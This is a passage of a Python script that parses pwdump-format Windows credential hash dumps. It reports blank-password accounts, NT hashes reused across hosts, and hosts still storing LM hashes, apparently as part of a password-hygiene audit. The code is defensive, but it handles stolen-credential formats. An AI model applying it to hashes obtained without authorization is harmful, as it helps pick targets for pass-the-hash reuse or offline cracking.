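    """user:rid:lm:nt::: -> dict; raises ValueError on malformed lines."""
    parts = line.strip().split(":")
    if len(parts) < 4 or not parts[1].isdigit():
        raise ValueError(f"not a pwdump line: {line!r}")
    return {"user": parts[0], "rid": int(parts[1]),
            "lm": parts[2].lower(), "nt": parts[3].lower()}


def blank_password_accounts(dumps):
    """(host, user) pairs whose NT hash is that of the empty string."""
    return [(host, e["user"]) for host, lines in dumps.items()
            for e in map(parse_pwdump, lines) if e["nt"] == EMPTY_NT]


def shared_hashes(dumps, ignore_empty=True):
    """NT hashes present on more than one host -> sorted list of (host, user)."""
    seen = defaultdict(set)
    for host, lines in dumps.items():
        for e in map(parse_pwdump, lines):
            if ignore_empty and e["nt"] == EMPTY_NT:
                continue
            seen[e["nt"]].add((host, e["user"]))
    return {nt: sorted(v) for nt, v in seen.items()
            if len({host for host, _ in v}) > 1}


def lm_hashes_present(dumps):
    """Hosts that still store real LM hashes (trivially crackable offline)."""
    return sorted({host for host, lines in dumps.items()
                   for e in map(parse_pwdump, lines) if e["lm"] != EMPTY_LM})


if __name__ == "__main__":
    for nt, accounts in shared_hashes(DUMPS).items():
        print(f"NT {nt} reused by {accounts}")
    print("blank passwords:", blank_password_accounts(DUMPS))
    print("LM hashes stored on:", lm_hashes_present(DUMPS))
```

Guest is excluded from the reuse report by default because its blank NT hash is the same everywhere and says nothing about password hygiene.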